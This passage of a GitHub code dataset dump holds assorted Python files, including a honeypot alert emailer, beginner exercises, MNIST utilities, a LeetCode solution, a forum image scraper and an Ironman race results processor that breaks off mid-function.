MIMEText(htmlEmail, \"html\")\n\n\t\tmessage.attach(textPart)\n\t\tmessage.attach(htmlPart)\n\n\t\treturn message\n\n\n\tasync def _sendEmail(self, emailMessage: EmailMessage) -> bool:\n\t\tasync with self.smtp_client:\n\t\t\t## await self.smtp_client.starttls()\n\t\t\treturn await aiosmtplib.send_message(emailMessage, \n\t\t\t\t\t\t\t\t\t\t\t\tport = self.smtp_port,\n\t\t\t\t\t\t\t\t\t\t\t\thostname = self.smtp_hostname)\n\t\t\n\t\t## TODO: Check whether it is neccessary to manually exec `starttls()` or is \n\t\t## this handled by the context manager\n\n\nasync def main() -> None:\n\tem = _email()\n\n\tincident = incidentReport(senderIP=\"10.11.189.14\", baitIP=\"10.11.189.98\", baitService=\"ftp\",\n\t\t\t\t\t\t\t\tbaitPort=21, exitRelayIP=\"10.11.182.22\", exitRelayMD=\"...\",\n\t\t\t\t\t\t\t\tbaitSetupTS=datetime.now(), baitCatchTS=datetime.now() + timedelta(seconds=4),\n\t\t\t\t\t\t\t\trawRequest=\"xxxx....xxxx\")\n\n\tout = await(em.sendEmail(incident))\n\nif __name__ == \"__main__\":\n\tasyncio.run(main())\n","repo_name":"user5423/BeeLurer","sub_path":"src/external/emailNotif.py","file_name":"emailNotif.py","file_ext":"py","file_size_in_byte":4153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"7311989308","text":"# Imports argv from the system module\nfrom sys import argv\n\n# Establishes the # of arguments needed to run program\nscript, filename = argv\n\n# Assigns a variable to open the filename argument.\ntxt = open(filename)\n\n# Tells you the name of the file\nprint(f\"Here's your file {filename}\")\n\n# Prints the file to the shell\nprint(txt.read())\ntxt.close()\n\n# Asks you to type the filename again.\n# Can type any filename however\nprint(\"Type the filename again:\")\n\n# Prompt for the filename and assigns it to a new variable.\nfile_again = input(\"> \")\n\n# Opens the file and assigns it to a new variable\ntxt_again = open(file_again)\n\n# Prints the file to the shell.\nprint(txt_again.read())\ntxt_again.close()","repo_name":"Vanamman/LP3THW","sub_path":"ex15.py","file_name":"ex15.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"20055060124","text":"import pymongo\n\n# mongoDB\nhost = '127.0.0.1'\nport = 27017\nset_name = \"taobao_comment\"\n\n\ndef save_mongoDB(comments_list, table_name):\n # 连接mongDB数据库\n client = pymongo.MongoClient(host=host, port=port)\n db = client[set_name]\n if comments_list:\n id = 'comment_id' if comments_list[0].get('comment_id') else 'rateId'\n for c in comments_list:\n # 数据入库\n db[table_name].update({id: c[id]}, {'$set': dict(c)}, True)\n","repo_name":"yuanle2020/taobao","sub_path":"save_comment_mongDB.py","file_name":"save_comment_mongDB.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"8847721072","text":"from PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QWidget, QHBoxLayout, QDoubleSpinBox, QPushButton\n\nfrom src.math.lagrange import Point\n\n\nclass PointWidget(QWidget):\n\n def __init__(\n self,\n remove_button_click: callable,\n spin_x_changed: callable,\n spin_y_changed: callable,\n point: Point = None\n ):\n super(PointWidget, self).__init__()\n if point is None:\n point = Point(0, 0)\n self.setLayout(QHBoxLayout(self))\n\n self.spin_x = QDoubleSpinBox(self)\n self.spin_x.setMinimum(-100.0)\n self.spin_x.setValue(point.x)\n self.spin_x.valueChanged.connect(spin_x_changed)\n self.layout().addWidget(self.spin_x)\n\n self.spin_y = QDoubleSpinBox(self)\n self.spin_y.setMinimum(-100.0)\n self.spin_y.setValue(point.y)\n self.spin_y.valueChanged.connect(spin_y_changed)\n self.layout().addWidget(self.spin_y)\n\n self.remove_button = QPushButton(self)\n self.remove_button.setIcon(QIcon('src/icons/X.png'))\n self.remove_button.clicked.connect(remove_button_click)\n self.layout().addWidget(self.remove_button)\n","repo_name":"gdn992/playing_with_math","sub_path":"src/components/pointWidget.py","file_name":"pointWidget.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"35269339536","text":"# Problem 154\n# Date completed: 2020/07/25\n\n# 52 ms (85%)\n\nclass Solution:\n def findMin(self, nums: List[int]) -> int:\n l, r = 0, len(nums)-1\n while l+1 < r:\n mid = (l+r) // 2\n if nums[l] == nums[mid]:\n return min(self.findMin(nums[l:mid+1]),self.findMin(nums[mid:r+1]))\n elif nums[l] < nums[mid]:\n if nums[mid] <= nums[r]:\n r = mid\n else:\n l = mid\n else:\n if nums[mid] <= nums[r]:\n r = mid\n else:\n l = mid\n \n return nums[l] if nums[l]<=nums[r] else nums[r]\n","repo_name":"actcheng/leetcode-solutions","sub_path":"0154_Find_Minimum_in_Rotated_Sorted_Array_II.py","file_name":"0154_Find_Minimum_in_Rotated_Sorted_Array_II.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"13562416884","text":"from src.uprecom.components.preprocess.whitespacefilter import WhitespaceFilter\n\n\ndef test_whitespace_scenarios():\n sentence = \"this. \\n\\n has too much. \\n \\n whitespace\"\n expected_sentence = \"this. has too much. whitespace\"\n\n filters = WhitespaceFilter()\n\n filtered_text = filters.process(sentence)\n\n assert filtered_text == expected_sentence\n","repo_name":"acharya2112/uprecom","sub_path":"test/components/preprocess/test_whitespace.py","file_name":"test_whitespace.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"28959901500","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n\nimport logging\nimport os\n\nimport coloredlogs\n\nfrom mattapi.util.arg_parser import get_core_args\nfrom mattapi.util.path_manager import PathManager\n\ncore_args = get_core_args()\n\nSUCCESS_LEVEL_NUM = 35\nlogging.addLevelName(SUCCESS_LEVEL_NUM, 'SUCCESS')\n\nlogger = logging.getLogger(__name__)\n\n\ndef success(self, message, *args, **kws):\n \"\"\"Log 'msg % args' with severity 'SUCCESS' (level = 35).\n To pass exception information, use the keyword argument exc_info with\n a true value, e.g.\n logger.success('Houston, we have a %s', 'thorny problem', exc_info=1)\n \"\"\"\n if self.isEnabledFor(SUCCESS_LEVEL_NUM):\n self._log(SUCCESS_LEVEL_NUM, message, args, **kws)\n\n\nlogging.Logger.success = success\n\n\ndef initialize_logger_level(level):\n if level == 10:\n coloredlogs.install(level='DEBUG')\n elif level == 20:\n coloredlogs.install(level='INFO')\n elif level == 30:\n coloredlogs.install(level='WARNING')\n elif level == 40:\n coloredlogs.install(level='ERROR')\n elif level == 50:\n coloredlogs.install(level='CRITICAL')\n\n\ndef set_log_format():\n\n if core_args.level < 20:\n log_format = '%(asctime)s [%(levelname)s] %(message)s'\n coloredlogs.DEFAULT_LOG_FORMAT = log_format\n coloredlogs.DEFAULT_FIELD_STYLES = {'levelname': {'color': 'cyan', 'bold': True}}\n coloredlogs.DEFAULT_LEVEL_STYLES = {'warning': {'color': 'yellow', 'bold': True},\n 'success': {'color': 'green', 'bold': True},\n 'error': {'color': 'red', 'bold': True}}\n else:\n log_format = '%(message)s'\n coloredlogs.DEFAULT_LOG_FORMAT = log_format\n coloredlogs.DEFAULT_LEVEL_STYLES = {'warning': {'color': 'yellow', 'bold': True},\n 'success': {'color': 'green', 'bold': True},\n 'error': {'color': 'red', 'bold': True}}\n return log_format\n\n\ndef initialize_logger():\n logging.basicConfig(filename=PathManager.get_log_file_path(), format=set_log_format())\n initialize_logger_level(core_args.level)\n\n # Control pytest terminal output via environment variable instead of parameter.\n if core_args.level > 10:\n os.environ['PYTEST_ADDOPTS'] = '-p no:terminal'\n","repo_name":"mwxfr/mattapi","sub_path":"mattapi/util/logger_manager.py","file_name":"logger_manager.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"4553025848","text":"# Created by Haoyue Dai@06/27/2020\n\nimport gzip, os\nimport numpy as np\nimport torch\nimport torchvision.datasets as datasets\nfrom mpl_toolkits.axisartist.parasite_axes import HostAxes, ParasiteAxes\nimport matplotlib.pyplot as plt\nfrom matplotlib.offsetbox import OffsetImage, AnnotationBbox\nfrom matplotlib.cbook import get_sample_data\nimport torchvision.transforms as transforms\nimport random\n\n\nIMGCOL = 28\nMEAN, STD = 0.1307, 0.3081\nFILES = ['train-images-idx3-ubyte.gz',\n 'train-labels-idx1-ubyte.gz',\n 't10k-images-idx3-ubyte.gz',\n 't10k-labels-idx1-ubyte.gz']\nTRANS = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((MEAN,), (STD,))\n]),\n\ndef un_normalize(vectors):\n '''\n :param vectors: in shape (n, 784)\n :return: in shape (n, 784)\n '''\n return (vectors * STD) + MEAN\n\n\ndef load_MNIST_np(dir='./data/MNIST/raw', normlize=True, load_binary=None, load_two_classes=None, sample_train_test=None):\n if not os.path.exists(dir):\n print(\"Now downloading MNIST to ./data/\")\n datasets.MNIST(root='./data/', train=True, transform=None, target_transform=None, download=True)\n def _images(path, normlize=True):\n with gzip.open(path) as f:\n pixels = np.frombuffer(f.read(), 'B', offset=16) # first 16 bytes are magic_number, n_imgs, n_rows, n_cols\n imgs = pixels.reshape(-1, IMGCOL ** 2).astype('float32') / 255\n if normlize:\n imgs = (imgs - MEAN) / STD\n return imgs\n\n def _labels(path):\n with gzip.open(path) as f:\n integer_labels = np.frombuffer(f.read(), 'B', offset=8) # first 8 bytes are magic_number, n_labels\n n_rows = len(integer_labels)\n n_cols = integer_labels.max() + 1\n onehot = np.zeros((n_rows, n_cols), dtype='uint8')\n onehot[np.arange(n_rows), integer_labels] = 1\n return onehot\n\n def _sample_binary(images, labels, load_binary):\n # where 1 for images in given class, 0 for random samples from rest, load_binary like 3\n labels = np.argmax(labels, axis=1) #onehot to index\n\n indices1 = (np.where(labels == load_binary)[0]).tolist()\n indices0 = random.sample(np.where(labels != load_binary)[0].tolist(), len(indices1))\n indices = [(x, 1) for x in indices1] + [(x, 0) for x in indices0]\n random.shuffle(indices)\n\n images = images[[x[0] for x in indices]]\n labels = np.array([x[1] for x in indices], dtype=int)\n labels = labels.reshape((labels.shape[0], -1))\n return images, labels\n\n def _sample_two(images, labels, load_two_classes):\n # load two given classes, load_two_classes like (3,5)\n labels = np.argmax(labels, axis=1) # onehot to index\n indices = np.where((labels == load_two_classes[0]) | (labels == load_two_classes[1]))\n images = images[indices]\n labels = (labels[indices] == load_two_classes[1]).astype(int)\n labels = labels.reshape((labels.shape[0], -1))\n return images, labels\n\n train_images = _images(os.path.join(dir, FILES[0]), normlize)\n train_labels = _labels(os.path.join(dir, FILES[1]))\n test_images = _images(os.path.join(dir, FILES[2]), normlize)\n test_labels = _labels(os.path.join(dir, FILES[3]))\n\n if load_binary != None:\n train_images, train_labels = _sample_binary(train_images, train_labels, load_binary)\n test_images, test_labels = _sample_binary(test_images, test_labels, load_binary)\n\n if load_two_classes != None:\n train_images, train_labels = _sample_two(train_images, train_labels, load_two_classes)\n test_images, test_labels = _sample_two(test_images, test_labels, load_two_classes)\n\n if sample_train_test != None:\n indices_train = 
random.sample(list(range(len(train_labels))), sample_train_test[0])\n indices_test = random.sample(list(range(len(test_labels))), sample_train_test[1])\n train_images, train_labels, test_images, test_labels = train_images[indices_train], train_labels[indices_train], \\\n test_images[indices_test], test_labels[indices_test]\n\n return train_images, train_labels, test_images, test_labels\n\n\ndef drawCurveDonkey(intxtpath, outimgpath, title, xlabel='epoch', par1label='loss', par2label='accuracy(%)'):\n xs = []\n p1s = []\n p2s = []\n\n with open(intxtpath, 'r') as fin:\n lines = [l.strip() for l in fin.readlines()]\n for line in lines:\n x, p1, p2 = line.split('\\t')\n xs.append(int(x))\n p1s.append(float(p1))\n p2s.append(float(p2))\n\n fig = plt.figure()\n host = HostAxes(fig, [0.15, 0.1, 0.65, 0.8])\n par1 = ParasiteAxes(host, sharex=host)\n host.parasites.append(par1)\n host.axis['right'].set_visible(False)\n par1.axis['right'].set_visible(True)\n par1.set_ylabel(par2label)\n par1.axis['right'].major_ticklabels.set_visible(True)\n par1.axis['right'].label.set_visible(True)\n fig.add_axes(host)\n host.set_xlabel(xlabel)\n host.set_ylabel(par1label)\n p1, = host.plot(np.array(xs), np.array(p1s), label=par1label)\n p2, = par1.plot(np.array(xs), np.array(p2s), label=par2label)\n plt.title(title)\n host.legend()\n host.axis['left'].label.set_color(p1.get_color())\n par1.axis['right'].label.set_color(p2.get_color())\n plt.savefig(outimgpath, dpi=150)\n plt.clf()\n\ndef imscatter(xs, ys, images, ax, colorRGB, zoom=0.5):\n artists = []\n images = un_normalize(images)\n\n RGBmean = np.mean(colorRGB)\n images = 1 - images # pencil -> 0 (black), background -> 1 (white)\n images = images.reshape(-1, IMGCOL, IMGCOL)\n larger = np.where(images > RGBmean) # larger means more likely to be background, set color; if not, keep original\n images = np.repeat(images[:, :, :, None], 3, axis=3)\n images[larger] = colorRGB\n\n for i, (x0, y0) in enumerate(zip(xs, ys)):\n image = images[i]\n im = OffsetImage(image, zoom=zoom) #[::2, ::2]\n ab = AnnotationBbox(im, (x0, y0), frameon=False) # xycoords='data', frameon=False\n artists.append(ax.add_artist(ab))\n ax.update_datalim(np.column_stack([xs, ys]))\n ax.autoscale()\n return artists\n\n","repo_name":"MarkDana/Logistic-and-LDA-from-Scratch","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6228,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"69"}
+{"seq_id":"13657134477","text":"from datetime import date\nfrom email.policy import default\nimport os\nimport csv\n\n\nbudget_bank = os.path.join('Resources', 'budget_data.csv')\n\nwith open(budget_bank) as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',')\n\n csv_header = next(csvreader)\n print(f\"csv_header: {csv_header}\")\n\n total_month = 0\n net_amo = 0\n Change = []\n avarage = []\n biggest_increase = str\n biggest_decrease = str\n number = []\n New_Change = []\n date_listed = []\n pl_listed = []\n max_amount = str\n min_amount = str\n\n \n #find total months\n for row in csvreader:\n total_month += 1\n date_listed.append(row[0])\n\n #find net total amount of profits/loss\n net_amo = net_amo + int(row[1])\n\n #put numbers of profit/loss in a list to find avg change\n number.append(int(row[1]))\n \n \n print(date_listed) \n print(number) \n\nfor i in range(1,len(number)):\n Change = number[i] - number[i-1]\n pl_listed.append(Change)\n\n \nprint(pl_listed)\n\navarage = sum(pl_listed)/len(pl_listed) \n \n \n\n#testing print methods for max print(pl_listed.index(max(pl_listed)))\n##testing print methods for min printprint(pl_listed.index(min(pl_listed)))\n\nbiggest_increase = (date_listed[pl_listed.index(max(pl_listed))+1])\nbiggest_decrease = (date_listed[pl_listed.index(min(pl_listed))+1])\nmax_amount = max(pl_listed)\nmin_amount = min(pl_listed)\n\n\n#create .txt file\noutput_path = os.path.join('analysis', 'output.txt')\nwith open (output_path, 'w') as txt:\n txt.write(\"Financial Analysis\")\n txt.write(\"---------------------\")\n txt.write(\"\\n\")\n txt.write(f\" Total Months: {len(date_listed)}\")\n txt.write(\"\\n\") \n txt.write(f\" Total: $ {net_amo}\")\n txt.write(\"\\n\")\n txt.write(f\" Average: $ {avarage}\")\n txt.write(\"\\n\")\n txt.write(f\" Greatest Increase: {biggest_increase}, ($ {max_amount})\")\n txt.write(\"\\n\")\n txt.write(f\" Greatest Decrease: {biggest_decrease}, ($ {min_amount})\")\n","repo_name":"VitaminDsun/python-challenge","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"19553100619","text":"'''\nCreated on 2017年1月19日\n\n@author: Forcast1\n'''\nimport requests\nimport urllib\nimport bs4\nimport os\n\n\nresponse = requests.get(\"http://tieba.baidu.com/p/4072681229\")\n\nsoup = bs4.BeautifulSoup(response.text,\"html.parser\")\nhc=soup.find_all('img',class_=\"BDE_Image\")\nimg_count=1\nfor m in hc:\n \n img_name=\"%s.jpg\"%img_count\n print(m)\n urllib.request.urlretrieve(m['src'],img_name)\n img_count+=1\n print(img_count)\n ","repo_name":"mayfool/test","sub_path":"crawler/testBs4.py","file_name":"testBs4.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"15039684189","text":"from torchvision import transforms\nfrom base import BaseDataLoader\nfrom .dataset import MaskDataset, MaskGlobDataset\n\n\nclass MaskDataLoader(BaseDataLoader):\n \"\"\"\n Competition Mask DataLoader\n \"\"\"\n def __init__(self, data_dir, batch_size, shuffle=True, validation_split=0.0, num_workers=1, training=True, dataset='default'):\n # default transform\n trsfm = transforms.Compose([\n transforms.ToTensor(),\n transforms.CenterCrop((320, 256))\n ])\n\n self.data_dir = data_dir\n self.dataset = self._get_dataset(dataset, data_dir, trsfm, training)\n\n super().__init__(self.dataset, batch_size, shuffle, validation_split, num_workers)\n \n def _get_dataset(self, dataset, data_dir, trsfm, train):\n if dataset == 'glob':\n return MaskGlobDataset(data_dir, trsfm, train)\n return MaskDataset(data_dir, trsfm, train)\n\n\n'''\nmytransform = transforms.Compose([\n transforms.Resize((256, 256)),\n transforms.RandomCrop(244),\n transforms.RandomHorizontalFlip(),\n transforms.RandomVerticalFlip(),\n transforms.RandomRotation(degrees=(0, 360)),\n transforms.RandomPerspective(),\n transforms.ToTensor(),\n])\n\nmyvaltransform =transforms.Compose([\n transforms.Resize((256, 256)),\n transforms.ToTensor(),\n])\n'''","repo_name":"boostcampaitech4cv1/level1_imageclassification_cv-level1-cv-01","sub_path":"data_loader/data_loaders.py","file_name":"data_loaders.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"38143849398","text":"#!/usr/bin/env python3\nfrom argparse import ArgumentParser\nfrom base import dt, log\nfrom base.location.resolver import LocationResolver\nfrom data.storage import DataStorage\nfrom data.ironman.parser import constants, race_parser, result_parser\nfrom decimal import *\nfrom pymongo import MongoClient\nfrom race import builder\nfrom race.storage import RaceStorage\n\n\nlogger = log.setup_logger(__file__, debug=False)\n\ncountry_resolver = LocationResolver()\n\nIRONMAN_EVENT_STATUS_TO_TRISCORE = {\n constants.EVENT_STATUS_DQ: builder.FINISH_STATUS_DQ,\n constants.EVENT_STATUS_DNS: builder.FINISH_STATUS_DNS,\n constants.EVENT_STATUS_DNF: builder.FINISH_STATUS_DNF,\n constants.EVENT_STATUS_FINISH: builder.FINISH_STATUS_OK\n}\n\nLEG_IRONMAN_TO_TRISCORE = {\n constants.SWIM_LEG: builder.SWIM_LEG,\n constants.T1_LEG: builder.T1_LEG,\n constants.BIKE_LEG: builder.BIKE_LEG,\n constants.T2_LEG: builder.T2_LEG,\n constants.RUN_LEG: builder.RUN_LEG,\n constants.FINISH_LEG: builder.FINISH_LEG\n}\n\n\ndef get_location_info(race):\n country_iso_num = race_parser.get_country_iso_numeric(race)\n continent = race_parser.get_continent(race)\n country = race_parser.get_country(race)\n state = race_parser.get_state_or_province(race)\n city = race_parser.get_city(race)\n return builder.build_location_info(country_iso_num, continent, country, state, city)\n\n\ndef get_distance_info(race):\n total_distance = race_parser.get_distance_in_km(race)\n if total_distance is None:\n total_distance = race_parser.get_distance_by_tri_type(race)\n\n swim_type = race_parser.get_swim_type(race)\n bike_type = race_parser.get_bike_type(race)\n run_type = race_parser.get_run_type(race)\n return builder.build_distance_info(total_distance, swim_type, bike_type, run_type)\n\n\ndef get_sorted_results(race_results, sort_by):\n return sorted(race_results, key=lambda result: result[sort_by])\n\n\ndef get_stats(race_results):\n total_count = len(race_results)\n success_count = 0\n male_count = 0\n female_count = 0\n for race_result in race_results:\n success_count += result_parser.is_finished(race_result)\n male_count += result_parser.is_male(race_result)\n female_count += result_parser.is_female(race_result)\n\n return builder.build_stats(\n total=total_count,\n success=success_count,\n male=male_count,\n female=female_count)\n\n\ndef get_ranks_by_legs(race_results, count_by_age_group, count_by_gender):\n age_rank = {}\n gender_rank = {}\n overall_rank = {}\n\n time_age_rank = {}\n time_gender_rank = {}\n time_overall_rank = {}\n\n LAST_EQUAL_RANK = '__last_equal_rank'\n LAST_RANK = '__last_rank'\n LAST_TIME = '__last_time'\n total_count = len(race_results)\n\n for leg in constants.LEG_NAMES:\n min_leg_time = {}\n max_leg_time = {}\n\n age_rank[leg] = {}\n gender_rank[leg] = {}\n overall_rank[leg] = {}\n\n logger.debug(f'========= LEG: {leg}')\n\n last_leg_time = 0\n for race_result in get_sorted_results(race_results, sort_by=f'{leg}Time'):\n age = result_parser.get_age_group(race_result)\n gender = result_parser.get_gender(race_result)\n contact_id = result_parser.get_contact_id(race_result)\n leg_time = result_parser.get_leg_time(race_result, leg)\n\n if age not in min_leg_time:\n min_leg_time[age] = builder.MAX_TIME\n max_leg_time[age] = 0\n\n if gender not in min_leg_time:\n min_leg_time[gender] = builder.MAX_TIME\n max_leg_time[gender] = 0\n\n if 'overall' not in min_leg_time:\n min_leg_time['overall'] = builder.MAX_TIME\n max_leg_time['overall'] = 0\n\n min_leg_time[age] = min(min_leg_time[age], 
leg_time)\n min_leg_time[gender] = min(min_leg_time[gender], leg_time)\n min_leg_time['overall'] = min(min_leg_time['overall'], leg_time)\n\n assert leg_time >= last_leg_time, f'descending leg time: {leg_time} last: {last_leg_time} result: {race_result}'\n\n if leg_time != builder.MAX_TIME:\n max_leg_time[age] = max(max_leg_time[age], leg_time)\n max_leg_time[gender] = max(max_leg_time[gender], leg_time)\n max_leg_time['overall'] = max(\n max_leg_time['overall'], leg_time)\n\n age_time_key = age + LAST_TIME\n age_rank_key = age + LAST_RANK\n age_equal_rank_key = age + LAST_EQUAL_RANK\n if age_time_key not in age_rank[leg]:\n age_rank[leg][age_time_key] = 0\n age_rank[leg][age_rank_key] = 0\n age_rank[leg][age_equal_rank_key] = 1\n\n gender_time_key = gender + LAST_TIME\n gender_rank_key = gender + LAST_RANK\n gender_equal_rank_key = gender + LAST_EQUAL_RANK\n if gender_time_key not in gender_rank[leg]:\n gender_rank[leg][gender_time_key] = 0\n gender_rank[leg][gender_rank_key] = 0\n gender_rank[leg][gender_equal_rank_key] = 1\n\n overall_time_key = 'overall' + LAST_TIME\n overall_rank_key = 'overall' + LAST_RANK\n overall_equal_rank_key = 'overall' + LAST_EQUAL_RANK\n if overall_time_key not in overall_rank[leg]:\n overall_rank[leg][overall_time_key] = 0\n overall_rank[leg][overall_rank_key] = 0\n overall_rank[leg][overall_equal_rank_key] = 1\n\n if leg_time > age_rank[leg][age_time_key]:\n age_rank[leg][age_rank_key] += age_rank[leg][age_equal_rank_key]\n age_rank[leg][age_time_key] = leg_time\n age_rank[leg][age_equal_rank_key] = 1\n elif leg_time == age_rank[leg][age_time_key]:\n age_rank[leg][age_equal_rank_key] += 1\n\n if leg_time > gender_rank[leg][gender_time_key]:\n gender_rank[leg][gender_rank_key] += gender_rank[leg][gender_equal_rank_key]\n gender_rank[leg][gender_time_key] = leg_time\n gender_rank[leg][gender_equal_rank_key] = 1\n elif leg_time == gender_rank[leg][gender_time_key]:\n gender_rank[leg][gender_equal_rank_key] += 1\n\n if leg_time > overall_rank[leg][overall_time_key]:\n overall_rank[leg][overall_rank_key] += overall_rank[leg][overall_equal_rank_key]\n overall_rank[leg][overall_time_key] = leg_time\n overall_rank[leg][overall_equal_rank_key] = 1\n elif leg_time == overall_rank[leg][overall_time_key]:\n overall_rank[leg][overall_equal_rank_key] += 1\n\n age_rank[leg][contact_id] = age_rank[leg][age_rank_key]\n gender_rank[leg][contact_id] = gender_rank[leg][gender_rank_key]\n overall_rank[leg][contact_id] = overall_rank[leg][overall_rank_key]\n else:\n age_rank[leg][contact_id] = count_by_age_group[age]\n gender_rank[leg][contact_id] = count_by_gender[gender]\n overall_rank[leg][contact_id] = total_count\n\n last_leg_time = leg_time\n\n time_age_rank[leg] = {}\n time_gender_rank[leg] = {}\n time_overall_rank[leg] = {}\n\n for race_result in race_results:\n age = result_parser.get_age_group(race_result)\n gender = result_parser.get_gender(race_result)\n contact_id = result_parser.get_contact_id(race_result)\n leg_time = result_parser.get_leg_time(race_result, leg)\n if leg_time != builder.MAX_TIME:\n time_age_rank[leg][contact_id] = 1.\n min_age_time = min_leg_time[age]\n max_age_time = max_leg_time[age]\n assert max_age_time != 0, f'invalid max_age_time: {max_age_time}'\n if min_age_time != max_age_time:\n time_age_rank[leg][contact_id] += \\\n 1. 
* (count_by_age_group[age] - 1) * \\\n (leg_time - min_age_time) / \\\n (max_age_time - min_age_time)\n\n time_gender_rank[leg][contact_id] = 1.\n min_gender_time = min_leg_time[gender]\n max_gender_time = max_leg_time[gender]\n assert max_gender_time != 0, f'invalid max_gender_time: {max_gender_time}'\n if min_gender_time != max_gender_time:\n time_gender_rank[leg][contact_id] += \\\n 1. * (count_by_gender[gender] - 1) * \\\n (leg_time - min_gender_time) / \\\n (max_gender_time - min_gender_time)\n\n time_overall_rank[leg][contact_id] = 1.\n min_overall_time = min_leg_time['overall']\n max_overall_time = max_leg_time['overall']\n assert max_overall_time != 0, f'invalid max_overall_time: {max_overall_time}'\n if min_overall_time != max_overall_time:\n time_overall_rank[leg][contact_id] += \\\n 1. * (total_count - 1) * \\\n (leg_time - min_overall_time) / \\\n (max_overall_time - min_overall_time)\n else:\n time_age_rank[leg][contact_id] = count_by_age_group[age]\n time_gender_rank[leg][contact_id] = count_by_gender[gender]\n time_overall_rank[leg][contact_id] = total_count\n\n return age_rank, gender_rank, overall_rank, time_age_rank, time_gender_rank, time_overall_rank\n\n\ndef filter_result_duplicates(race_results):\n last_contact_id = ''\n filtered_race_results = []\n for race_result in sorted(race_results, key=lambda result: (result['ContactId'], -result['FinishTime'])):\n contact_id = result_parser.get_contact_id(race_result)\n if contact_id == last_contact_id:\n logger.debug(\n f'filter duplicated result {race_result}')\n else:\n filtered_race_results.append(race_result)\n\n last_contact_id = contact_id\n\n duplicates_filtered = len(race_results) - len(filtered_race_results)\n logger.debug(f'filtered {duplicates_filtered} result duplicates')\n return filtered_race_results\n\n\ndef fix_undefined_times(race_results):\n for race_result in race_results:\n logger.debug(race_result)\n athlete_name = result_parser.get_athlete_name(race_result)\n\n for leg in constants.LEG_NAMES:\n leg_finish_time = int(result_parser.get_leg_time(race_result, leg))\n\n set_finish_time_as_max = False\n if leg == constants.FINISH_LEG:\n finish_status = result_parser.get_finish_status(race_result)\n set_finish_time_as_max = finish_status != constants.EVENT_STATUS_FINISH\n\n if set_finish_time_as_max or \\\n leg_finish_time <= 0 or \\\n leg_finish_time > builder.MAX_TIME:\n leg_field = f'{leg}Time'\n logger.debug(\n f'Fix athlete: {athlete_name} leg: {leg_field} '\n f'from {leg_finish_time} to {builder.MAX_TIME}: {race_result}')\n race_result[leg_field] = builder.MAX_TIME\n return race_results\n\n\ndef transform_ironman_to_triscore(mongo_client, limit, dry_run):\n ironman_races_storage = DataStorage(mongo_client=mongo_client, db_name='ironman', collection_name='races')\n\n triscore_storage = RaceStorage(mongo_client=mongo_client, db_name='triscore', create_indices=True)\n\n ironman_races = ironman_races_storage.find(\n where={DataStorage.INVALID_FIELD: False, DataStorage.PROCESSED_FIELD: True},\n sort=[('Date', 1)],\n limit=limit)\n count = ironman_races.count()\n\n logger.info(f'{count} new races found')\n\n max_count = -1\n for i, race in enumerate(ironman_races):\n if i == max_count:\n logger.info(f'stopping by max count: {max_count}')\n break\n\n race_series = race_parser.get_series(race)\n race_date = race_parser.get_date(race)\n\n if triscore_storage.race_processed(race_series, race_date):\n logger.info(f'skip processed race {race_series} {race_date}')\n continue\n\n subevent_id = 
race_parser.get_subevent_id(race)\n\n logger.info(\n f'{i + 1}/{count} process race series: {race_series} date: {race_date} id: {subevent_id}')\n\n race_results_storage = DataStorage(mongo_client=mongo_client, db_name='ironman', collection_name=subevent_id)\n race_results = list(race_results_storage.find())\n race_results = filter_result_duplicates(race_results)\n race_results = fix_undefined_times(race_results)\n\n if triscore_storage.has_race(name=race_series, date=race_date):\n race_written_length = triscore_storage.get_race_length(name=race_series, date=race_date)\n race_new_length = len(race_results)\n\n logger.warning(\n f'drop existing collection for'\n f' race series: {race_series}'\n f' date: {race_date}'\n f' race_written_length: {race_written_length}'\n f' race_new_length: {race_new_length}')\n triscore_storage.remove_race(name=race_series, date=race_date)\n\n # Race info\n location_info = get_location_info(race)\n distance_info = get_distance_info(race)\n race_stats = get_stats(race_results)\n\n race_info = builder.build_race_info(\n name=race_series,\n date=race_date,\n brand=constants.IRONMAN_BRAND,\n tri_type=race_parser.get_tri_type(race),\n location_info=location_info,\n distance_info=distance_info,\n stats=race_stats)\n logger.debug(f'info: {race_info}')\n\n\n # Rank by leg\n count_by_age_group = {}\n for race_result in race_results:\n age_group = result_parser.get_age_group(race_result)\n if age_group not in count_by_age_group:\n count_by_age_group[age_group] = 0\n count_by_age_group[age_group] += 1\n\n count_by_gender = {}\n for race_result in race_results:\n gender = result_parser.get_gender(race_result)\n if gender not in count_by_gender:\n count_by_gender[gender] = 0\n count_by_gender[gender] += 1\n\n age_rank, gender_rank, overall_rank, time_age_rank, time_gender_rank, time_overall_rank = \\\n get_ranks_by_legs(\n race_results, count_by_age_group, count_by_gender)\n\n def get_legs(race_result):\n legs = {}\n for ironman_leg_name in constants.LEG_NAMES:\n 